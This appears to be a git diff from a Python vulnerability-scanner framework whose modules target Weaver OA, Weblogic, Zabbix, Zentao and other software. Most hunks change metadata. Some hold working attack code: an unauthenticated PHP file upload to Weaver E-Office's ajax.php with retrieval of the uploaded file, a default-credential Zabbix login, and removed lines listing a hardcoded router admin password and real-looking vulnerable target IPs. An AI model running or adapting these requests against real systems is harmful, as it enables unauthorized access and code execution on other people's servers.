"AppName" : "泛微OA E-Office", # 漏洞应用名称
"AppVersion" : "E-Office V9", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..a982fe8
Binary files /dev/null and b/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py b/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/poc.py
similarity index 57%
rename from poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py
rename to poc/Weaver_泛微OA/File_Upload_E_Office_ajax/poc.py
index 8c1734f..01a195b 100644
--- a/poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py
+++ b/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/poc.py
@@ -1,6 +1,6 @@
# coding:utf-8
import requests
-from lib.core.common import url_handle,get_random_ua
+from lib.core.common import url_handle,get_random_ua,random_str
from lib.core.poc import POCBase
import re
# ...
@@ -10,17 +10,17 @@ urllib3.disable_warnings()
class POC(POCBase):
_info = {
- "author" : "hansi", # POC作者
+ "author" : "jijue", # POC作者
"version" : "1", # POC版本,默认是1
"CreateDate" : "2022-1-10", # POC创建时间
"UpdateDate" : "2022-1-10", # POC创建时间
"PocDesc" : """
- 原POC逻辑过于简单,存在大量误报,现已优化
+
""", # POC描述,写更新描述,没有就不写
- "name" : "泛微e-office存在前台文件上传漏洞" , # 漏洞名称
+ "name" : "泛微E-Office存在前台文件上传漏洞" , # 漏洞名称
"VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
- "AppName" : "泛微-EOffice", # 漏洞应用名称
+ "AppName" : "泛微 E-Office", # 漏洞应用名称
"AppVersion" : "无", # 漏洞应用版本
"VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
"VulnDesc" : """
@@ -28,9 +28,9 @@ class POC(POCBase):
""" , # 漏洞简要描述
"fofa-dork":"" , """
- app="泛微-EOffice"
+
""" # fofa搜索语句
- "example" : "http://219.153.106.177:81/", # 存在漏洞的演示url,写一个就可以了
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
"exp_img" : "", # 先不管
}
@@ -46,32 +46,38 @@ class POC(POCBase):
不存在漏洞:vuln = [False,""]
"""
vuln = [False,""]
- url = self.target + "/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save" # url自己按需调整
- # date="command1=shell:ifconfig| dd of=/tmp/a.txt"
+ url0 = self.target + "/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save" # url0自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
- # "Content-Type": "application/x-www-form-urlencoded",
+ "Content-Type": "multipart/form-data; boundary=12f83ada5e3c205e29da579b538944ff",
}
- data = """Content-Type: multipart/form-data; boundary=12f83ada5e3c205e29da579b538944ff
-
+ flag = random_str()
+ data = """
--12f83ada5e3c205e29da579b538944ff
Content-Disposition: form-data; name="upload_quwan"; filename="test.php4"
Content-Type: application/octet-stream
-
+
--12f83ada5e3c205e29da579b538944ff
-"""
+""".format(flag=flag)
try:
"""
检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
"""
- req = requests.post(url,headers = headers , data = data, proxies = self.proxy , timeout = self.timeout,verify = False)
- result = re.match("\[\d,\".+\",\d{10},\"\.\"\]",req.text.strip())
- if req.status_code == 200 and result != None:
- vuln = [True,req.text]
+ req0 = requests.post(url0,headers = headers , data = data, proxies = self.proxy , timeout = self.timeout,verify = False)
+ reg = """\[\d,".+",\d+.".+.php4"]"""
+ result = re.match(reg,req0.text.strip())
+ if req0.status_code == 200 and result :
+ urls = result.group()[1:-1].split(",")
+ dic1 = urls[2].strip("\"")
+ dic2 = urls[3].strip("\"")
+ url1 = self.target + "/attachment//" + dic1 + "//" + dic2
+ req1 = requests.get(url1,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False)
+ if req1.status_code == 200 and flag in req1.text:
+ vuln = [True,req1.text]
else:
- vuln = [False,req.text]
+ vuln = [False,req0.text]
except Exception as e:
raise e
@@ -80,6 +86,5 @@ Content-Type: application/octet-stream
return vuln
-
def _attack(self):
return self._verify()
\ No newline at end of file
diff --git a/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..e90bf74
Binary files /dev/null and b/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/poc.py b/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/poc.py
index c671f5f..e2a1c3d 100644
--- a/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/poc.py
+++ b/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "泛微V9 前台文件上传漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "泛微V9", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Weaver_泛微OA/Log_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Log_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..05e4dca
Binary files /dev/null and b/poc/Weaver_泛微OA/Log_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weaver_泛微OA/Log_Disclosure/poc.py b/poc/Weaver_泛微OA/Log_Disclosure/poc.py
index 27797cc..4f7e82f 100644
--- a/poc/Weaver_泛微OA/Log_Disclosure/poc.py
+++ b/poc/Weaver_泛微OA/Log_Disclosure/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "泛微OA 日志泄露", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "泛微oa", # 漏洞应用名称
"AppVersion" : "未知", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Weaver_泛微OA/RCE_Beanshell/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/RCE_Beanshell/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..407d7e8
Binary files /dev/null and b/poc/Weaver_泛微OA/RCE_Beanshell/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weaver_泛微OA/RCE_Beanshell/poc.py b/poc/Weaver_泛微OA/RCE_Beanshell/poc.py
index d6e7fd0..f32ea04 100644
--- a/poc/Weaver_泛微OA/RCE_Beanshell/poc.py
+++ b/poc/Weaver_泛微OA/RCE_Beanshell/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "泛微OA Beanshell 远程代码执行漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "泛微e-cology OA系统", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..a59d9dd
Binary files /dev/null and b/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py b/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/poc.py
similarity index 98%
rename from poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py
rename to poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/poc.py
index b7df963..2cae2d3 100644
--- a/poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py
+++ b/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/poc.py
@@ -14,7 +14,7 @@ class POC(POCBase):
"CreateDate" : "2022-01-15", # POC创建时间
"UpdateDate" : "2022-01-15", # POC创建时间
"PocDesc" : """
- 略
+ 略
""", # POC描述,写更新描述,没有就不写
"name" : "泛微E-office V9.5 SQL注入漏洞", # 漏洞名称
@@ -27,7 +27,7 @@ class POC(POCBase):
""", # 漏洞简要描述
"fofa-dork":"""
- app="泛微-EOffice"
+ app="泛微-EOffice"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url,写一个就可以了
"exp_img" : "", # 先不管
diff --git a/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..0b1f74d
Binary files /dev/null and b/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/poc.py b/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/poc.py
index be5b119..e42bdbf 100644
--- a/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/poc.py
+++ b/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "泛微 E-cology WorkflowCenterTreeData.jsp文件 前台SQL注入漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "泛微 e-cology OA 系统", # 漏洞应用名称
"AppVersion" : "使用oracle数据库的泛微 e-cology OA 系统", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Weaver_泛微OA/Sql_inj_E_cology_V8/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Sql_inj_E_cology_V8/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..f1c6057
Binary files /dev/null and b/poc/Weaver_泛微OA/Sql_inj_E_cology_V8/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weblogic/CVE_2016_0638/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/CVE_2016_0638/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..e84372d
Binary files /dev/null and b/poc/Weblogic/CVE_2016_0638/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weblogic/CVE_2017_10271/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/CVE_2017_10271/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..1f71873
Binary files /dev/null and b/poc/Weblogic/CVE_2017_10271/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weblogic/RCE_CVE_2018_3191/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/RCE_CVE_2018_3191/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..eebf27e
Binary files /dev/null and b/poc/Weblogic/RCE_CVE_2018_3191/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weblogic/SSRF_CVE_2014_4210/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/SSRF_CVE_2014_4210/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..e3de184
Binary files /dev/null and b/poc/Weblogic/SSRF_CVE_2014_4210/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weblogic/UnAuth_RCE_CVE_2020_14882/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/UnAuth_RCE_CVE_2020_14882/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..d160cbe
Binary files /dev/null and b/poc/Weblogic/UnAuth_RCE_CVE_2020_14882/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weblogic/XMLDecoder_CVE_2017_3506/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/XMLDecoder_CVE_2017_3506/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..1eca778
Binary files /dev/null and b/poc/Weblogic/XMLDecoder_CVE_2017_3506/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py b/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py
index 48193e7..c1e9ac8 100644
--- a/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py
+++ b/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py
@@ -9,7 +9,7 @@ urllib3.disable_warnings()
class POC(POCBase):
_info = {
- "author" : "", # POC作者
+ "author" : "jijue", # POC作者
"version" : "1", # POC版本,默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
@@ -43,7 +43,9 @@ class POC(POCBase):
def _verify(self):
"""
返回vuln
+
存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
不存在漏洞:vuln = [False,""]
"""
vuln = [False,""]
diff --git a/poc/Yonyou_用友NC/Dir_List_ERP/__pycache__/poc.cpython-38.pyc b/poc/Yonyou_用友NC/Dir_List_ERP/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..77782e6
Binary files /dev/null and b/poc/Yonyou_用友NC/Dir_List_ERP/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Yonyou_用友NC/RCE_BeanShell_CNVD_2021_30167/__pycache__/poc.cpython-38.pyc b/poc/Yonyou_用友NC/RCE_BeanShell_CNVD_2021_30167/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..d500c54
Binary files /dev/null and b/poc/Yonyou_用友NC/RCE_BeanShell_CNVD_2021_30167/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Yonyou_用友NC/Sqli_CNNVD_201610_923/__pycache__/poc.cpython-38.pyc b/poc/Yonyou_用友NC/Sqli_CNNVD_201610_923/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..8794e2c
Binary files /dev/null and b/poc/Yonyou_用友NC/Sqli_CNNVD_201610_923/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Zabbix/Weak_Pass/__pycache__/poc.cpython-38.pyc b/poc/Zabbix/Weak_Pass/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..2448a58
Binary files /dev/null and b/poc/Zabbix/Weak_Pass/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/China_TeleCOM_中国电信/MAC1200R_Weak_Pass/poc.py b/poc/Zabbix/Weak_Pass/poc.py
similarity index 55%
rename from poc/China_TeleCOM_中国电信/MAC1200R_Weak_Pass/poc.py
rename to poc/Zabbix/Weak_Pass/poc.py
index 98516ad..6e09708 100644
--- a/poc/China_TeleCOM_中国电信/MAC1200R_Weak_Pass/poc.py
+++ b/poc/Zabbix/Weak_Pass/poc.py
@@ -9,34 +9,30 @@ urllib3.disable_warnings()
class POC(POCBase):
_info = {
- "author" : "hansi", # POC作者
+ "author" : "jijue", # POC作者
"version" : "1", # POC版本,默认是1
- "CreateDate" : "2022-02-24", # POC创建时间
- "UpdateDate" : "2022-02-24", # POC创建时间
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
略
""", # POC描述,写更新描述,没有就不写
- "name" : "MAC1200R电信定制版弱口令", # 漏洞名称
- "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
- "AppName" : "MAC1200R电信定制版是一款路由", # 漏洞应用名称
+ "name" : "Zabbix弱口令", # 漏洞名称
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "Zabbix", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
- "VulnDate" : "2022-02-24", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
"VulnDesc" : """
- 通过相关系统测试发现MAC1200R电信定制版存在弱口令。黑客可利用漏洞获取敏感信息、并进一步控制该设备、或者对系统造成破坏。
+ zabbix默认口令是 Admin : zabbix
""", # 漏洞简要描述
"fofa-dork":"""
- "MAC1200R电信定制"
-
+ app="ZABBIX-监控系统"
""", # fofa搜索语句
- "example" : "http://117.172.135.8:8888/", # 存在漏洞的演示url,写一个就可以了
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
"exp_img" : "", # 先不管
}
- # timeout = 10
-
-
def _verify(self):
"""
返回vuln
@@ -47,22 +43,26 @@ class POC(POCBase):
"""
vuln = [False,""]
url = self.target + "" # url自己按需调整
+ data = "name=Admin&password=zabbix&autologin=1&enter=Sign+in"
- headers = {"User-Agent":get_random_ua(),
+ headers = {
+ "User-Agent":get_random_ua(),
"Connection":"close",
"Content-Type": "application/x-www-form-urlencoded",
}
- data = """
- {"method":"do","login":{"username":"telecomadmin","password":"iLKqgcKP9TefbwK"}}
-
- """
try:
"""
检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
"""
- req = requests.post(url,headers = headers , data = data ,proxies = self.proxy ,timeout = self.timeout,verify = False)
- if req.status_code == 200 and "stok" in req.text:
+ req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if "chkbxRange.init();" in req.text \
+ and \
+ "incorrect" not in req.text \
+ and \
+ "" not in req.text \
+ and \
+ req.status_code == 200:
vuln = [True,req.text]
else:
vuln = [False,req.text]
@@ -76,5 +76,4 @@ class POC(POCBase):
return vuln
def _attack(self):
- return self._verify()
-
+ return self._verify()
\ No newline at end of file
diff --git a/poc/Zentao_禅道/Getshell_test/__pycache__/poc.cpython-38.pyc b/poc/Zentao_禅道/Getshell_test/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..ccc25c8
Binary files /dev/null and b/poc/Zentao_禅道/Getshell_test/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Zentao_禅道/Getshell_test/poc.py b/poc/Zentao_禅道/Getshell_test/poc.py
index 0e8fb44..cc938be 100644
--- a/poc/Zentao_禅道/Getshell_test/poc.py
+++ b/poc/Zentao_禅道/Getshell_test/poc.py
@@ -21,7 +21,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "禅道8.2-9.2.1注入GetShell", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "禅道", # 漏洞应用名称
"AppVersion" : "禅道8.9-9.2.1", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/ZeroShell/RCE_kerbynet/__pycache__/poc.cpython-38.pyc b/poc/ZeroShell/RCE_kerbynet/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..3930956
Binary files /dev/null and b/poc/ZeroShell/RCE_kerbynet/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Zyxel/Login_Pass_NBG2105/__pycache__/poc.cpython-38.pyc b/poc/Zyxel/Login_Pass_NBG2105/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..3686471
Binary files /dev/null and b/poc/Zyxel/Login_Pass_NBG2105/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Zyxel/Login_Pass_NBG2105/poc.py b/poc/Zyxel/Login_Pass_NBG2105/poc.py
index bee4057..9363217 100644
--- a/poc/Zyxel/Login_Pass_NBG2105/poc.py
+++ b/poc/Zyxel/Login_Pass_NBG2105/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "Zyxel NBG2105身份验证绕过", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "Zyxel NBG2105", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/common/Apache_Dir_List/__pycache__/poc.cpython-38.pyc b/poc/common/Apache_Dir_List/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..2d3eb54
Binary files /dev/null and b/poc/common/Apache_Dir_List/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/common/Apache_Dir_List/poc.py b/poc/common/Apache_Dir_List/poc.py
index 089c3ad..06bbd22 100644
--- a/poc/common/Apache_Dir_List/poc.py
+++ b/poc/common/Apache_Dir_List/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
""", # POC描述,写更新描述,没有就不写
"name" : "Apache列目录", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/common/Git_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/common/Git_Info_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..1ad28e8
Binary files /dev/null and b/poc/common/Git_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/common/Git_Info_Disclosure/poc.pyc b/poc/common/Git_Info_Disclosure/poc.pyc
index 7e9f52e..0c45933 100644
Binary files a/poc/common/Git_Info_Disclosure/poc.pyc and b/poc/common/Git_Info_Disclosure/poc.pyc differ
diff --git a/poc/common/Svn_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/common/Svn_Info_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..78c4180
Binary files /dev/null and b/poc/common/Svn_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/common/Svn_Info_Disclosure/poc.pyc b/poc/common/Svn_Info_Disclosure/poc.pyc
index 087cc58..04401dd 100644
Binary files a/poc/common/Svn_Info_Disclosure/poc.pyc and b/poc/common/Svn_Info_Disclosure/poc.pyc differ
diff --git a/poc/common/Url_Alive/__pycache__/poc.cpython-38.pyc b/poc/common/Url_Alive/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..249449d
Binary files /dev/null and b/poc/common/Url_Alive/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/common/Url_Alive/poc.pyc b/poc/common/Url_Alive/poc.pyc
index dc6f7d4..53d68f5 100644
Binary files a/poc/common/Url_Alive/poc.pyc and b/poc/common/Url_Alive/poc.pyc differ
diff --git a/poc/demo/demo/poc.py b/poc/demo/demo/poc.py
index 5b8220d..eb5d68a 100644
--- a/poc/demo/demo/poc.py
+++ b/poc/demo/demo/poc.py
@@ -11,17 +11,17 @@ class POC(POCBase):
_info = {
"author" : "jijue", # POC作者
"version" : "1", # POC版本,默认是1
- "CreateDate" : "2021-06-09", # POC创建时间
- "UpdateDate" : "2021-06-09", # POC创建时间
+ "CreateDate" : "2022-01-01", # POC创建时间
+ "UpdateDate" : "2022-01-01", # POC创建时间
"PocDesc" : """
略
""", # POC描述,写更新描述,没有就不写
"name" : "Demo", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
- "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
"VulnDesc" : """
""", # 漏洞简要描述
@@ -45,7 +45,8 @@ class POC(POCBase):
url = self.target + "" # url自己按需调整
- headers = {"User-Agent":get_random_ua(),
+ headers = {
+ "User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
diff --git a/poc/jellyfin/File_Read_CVE_2021_21402/__pycache__/poc.cpython-38.pyc b/poc/jellyfin/File_Read_CVE_2021_21402/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..4bd21ad
Binary files /dev/null and b/poc/jellyfin/File_Read_CVE_2021_21402/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc b/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc
index 7f5cb0f..fd50364 100644
Binary files a/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc and b/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc differ
diff --git a/poc/jellyfin/SSRF_CVE_2021_29490/__pycache__/poc.cpython-38.pyc b/poc/jellyfin/SSRF_CVE_2021_29490/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..1eb4b26
Binary files /dev/null and b/poc/jellyfin/SSRF_CVE_2021_29490/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/php/Backdoor_v8dev/__pycache__/poc.cpython-38.pyc b/poc/php/Backdoor_v8dev/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..8db43bb
Binary files /dev/null and b/poc/php/Backdoor_v8dev/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/php/Backdoor_v8dev/poc.pyc b/poc/php/Backdoor_v8dev/poc.pyc
index f315c1f..22d0293 100644
Binary files a/poc/php/Backdoor_v8dev/poc.pyc and b/poc/php/Backdoor_v8dev/poc.pyc differ
diff --git a/poc/一指通/XiaMen_Yizhitong_Weak_pass/__pycache__/poc.cpython-38.pyc b/poc/一指通/XiaMen_Yizhitong_Weak_pass/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..bbea6a1
Binary files /dev/null and b/poc/一指通/XiaMen_Yizhitong_Weak_pass/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/中硅技术/ZhongGuijishu_Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/中硅技术/ZhongGuijishu_Unauth_Access/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..38d614b
Binary files /dev/null and b/poc/中硅技术/ZhongGuijishu_Unauth_Access/__pycache__/poc.cpython-38.pyc differ